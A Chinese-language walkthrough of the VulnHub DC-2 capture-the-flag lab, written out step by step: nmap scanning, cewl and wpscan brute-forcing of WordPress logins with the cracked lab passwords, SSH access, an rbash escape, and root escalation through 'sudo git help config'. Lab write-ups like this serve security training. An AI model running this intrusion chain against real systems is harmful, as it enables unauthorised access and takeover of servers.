1.下载与安装
1.1下载地址:
https://www.vulnhub.com/entry/dc-2,311/
下载后解压,vm打开
由于自己ip是在192.168.6.3 如果虚拟机还是桥接则不好判断虚拟机的ip地址,所以调整为net模式
2.初步探测
信息收集第一步肯定是先找ip,由于知道自己虚拟机网段是192.168.23.xxx
所以利用nmap工具进行扫描
命令
nmap -sP 192.168.23.0/24
192.168.23.173
再单独扫一次ip,看有什么收获
nmap --script=vuln 192.168.23.173
开启的80端口,且cms貌似是wordpress 不排除误报
尝试访问
http://192.168.23.173:80
抓取网络数据包,发现做了重定向,跳转的目标是dc-2
3.稍有端倪
在本地host文件中添加ip 写死指定目标为 dc-2
192.168.23.173 dc-2
可以看到确实是wordpress,而且存在一个flag
4.直击目标
4.1 flag1
大概意思就是让我登录才能看到下一个flag
刚刚nmap扫出来的就有用了
有路径,有用户
尝试访问
http://192.168.23.173/wp-login.php
此时用到wspcan 可以爆破用户的密码
刚刚网页上有cewl 拿去百度,是一个可以将网站的密码生成一个字典
cewl http://dc-2 -w dict.txt 生成字典 cat dict.txt 查看是否生成字典
再利用wpscan
新建一个txt文档将三个用户写入
wpscan --url http://dc-2 -P dict.txt -U user.txt
| Username: jerry, Password: adipiscing | Username: tom, Password: parturient
4.2 flag2
尝试登录 jerry登录成功找到了flag2
貌似意思是这条路找不到下去了,换条路吧
4.3 flag3
没思路了,再用nmap扫一次全端口
nmap -A -p 1-65535 192.168.23.173 -A 全面扫描 -p 1-65535 全端口扫描
ssh 22端口改成了7744
尝试连接
ssh jerry@192.168.23.173 -p 7744
连不上换个用户
ssh tom@192.168.23.173 -p 7744 在输入密码 parturient 连接成功
查看有啥内容 有个flag3
查看
cat flag3.txt vim flag3.txt vi flag3.txt
尝试几种打开方式,终于打开
三个重要的信息
tom jerry su 看到su 猜测和上一个一样需要提权什么的
4.4 flag4
发现刚刚都是有rbash
搜索
切换到jerry用户
尝试返回上一级目录进入jerry目录
找到了flag4
4.5 flag5
不知道怎么办
看了看教程
flag4最后有一个git,百度git提权
sudo -l查看可以sudo的用户
这里采用方法一 sudo git help config 执行之后在最后一行输入 !/bin/bash
查询当前用户权限 whoami -----> root
cd /root 切换到root目录下查看root目录下的内容 cat final-flag.txt
5.总结
1.首先利用nmap全端口扫描一个一个的利用
2.先解决重定向问题,正常打开网站得到flag1
3.利用wpscan爆破密码
4.登录得到flag2,80端口利用完毕
5.7744ssh端口利用账号密码登录,得到flag3
6.通过flag3提权到另一个用户找到flag4
7.git提权到root找到final-flag.txt